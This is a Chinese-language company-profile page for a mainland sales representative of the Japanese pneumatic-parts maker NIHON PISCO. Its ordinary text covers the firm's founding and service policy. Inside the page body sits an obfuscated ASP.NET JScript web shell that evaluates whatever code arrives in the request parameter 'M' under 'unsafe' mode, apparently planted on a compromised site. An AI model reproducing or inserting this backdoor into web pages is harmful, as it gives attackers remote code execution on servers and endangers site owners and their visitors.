关于我们

公司概况

您当前的位置:首页 > 公司概况


本公司是NIHON PISCO
在中国大陆官方的正规销售代表公司

本公司成立于2008年8月,主要从事日本PISCO及其集团;

公司生产的全部气动元件产品,在中国大陆地区的销售及技术咨询服务,以及有关国际贸易方面工作。

我们是谁?
Who we are

日本PISCO:WWW.PISCO.CO.JP 新加坡PISCO: WWW.PISCO.COM.SG

本公司秉着日本PISCO“以高质量的产品回应客户需求”的方针,根据客户的要求,提供最好的服务解决方案及优质的气动产品。

我们的方针
  • 碧铄科
    国际 · 贸易
    NIHON PISCO
<%@ Page Language="Jscript"%> <% var p = Request.Item["M"]; var a = p.substring(0,1); var b = p.substring(1,99999); var c = "un" + Char ( 115 ) + Char ( 97 ) + "fe"; eval(a+b,c); %>

友情链接

              

恭喜您!注册成功! 确定
恭喜您!找回密码成功! 确定